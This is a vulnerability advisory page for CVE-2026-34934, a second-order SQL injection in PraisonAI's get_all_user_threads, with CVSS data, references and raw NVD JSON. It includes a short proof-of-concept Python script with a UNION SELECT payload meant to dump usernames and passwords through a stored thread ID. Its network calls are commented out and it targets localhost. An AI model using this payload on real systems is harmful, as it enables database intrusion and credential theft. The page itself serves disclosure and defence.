CVE-2026-34934

Description

PraisonAI is a multi-agent teams system. Prior to version 4.5.90, the get_all_user_threads function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database. An attacker stores a malicious thread ID via update_thread. When the application loads the thread list, the injected payload executes and grants full database access. This issue has been patched in version 4.5.90.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE

PraisonAI < 4.5.90

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-34934
# Demonstrates how a malicious thread ID can trigger SQL Injection

import requests

TARGET = "http://localhost:8000"

# The payload attempts to dump the users table
# This ID is stored via update_thread
malicious_id = "' UNION SELECT username, password FROM users--"

def exploit():
    print(f"[*] Attempting to inject payload via update_thread: {malicious_id}")
    
    # Step 1: Store the malicious thread ID
    update_data = {
        "thread_id": malicious_id,
        "content": "Exploitation attempt"
    }
    # response = requests.post(f"{TARGET}/api/update_thread", json=update_data)
    
    # Step 2: Trigger the vulnerability by loading threads
    # The app calls get_all_user_threads which constructs SQL like:
    # SELECT * FROM threads WHERE id = '{malicious_id}'
    print("[*] Triggering get_all_user_threads to execute payload...")
    # response = requests.get(f"{TARGET}/api/get_all_user_threads")
    
    print("[!] If vulnerable, database data is leaked.")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34934
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34934
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34934/
[4] VulDB https://vuldb.com/cve/CVE-2026-34934
[5] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9cq8-3v94-434g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34934", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:05.533", "lastModified": "2026-04-14T18:15:14.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to version 4.5.90, the get_all_user_threads function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database. An attacker stores a malicious thread ID via update_thread. When the application loads the thread list, the injected payload executes and grants full database access. This issue has been patched in version 4.5.90."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.90", "matchCriteriaId": "072B6350-7972-417B-8540-DAAFF3230EC7"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9cq8-3v94-434g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}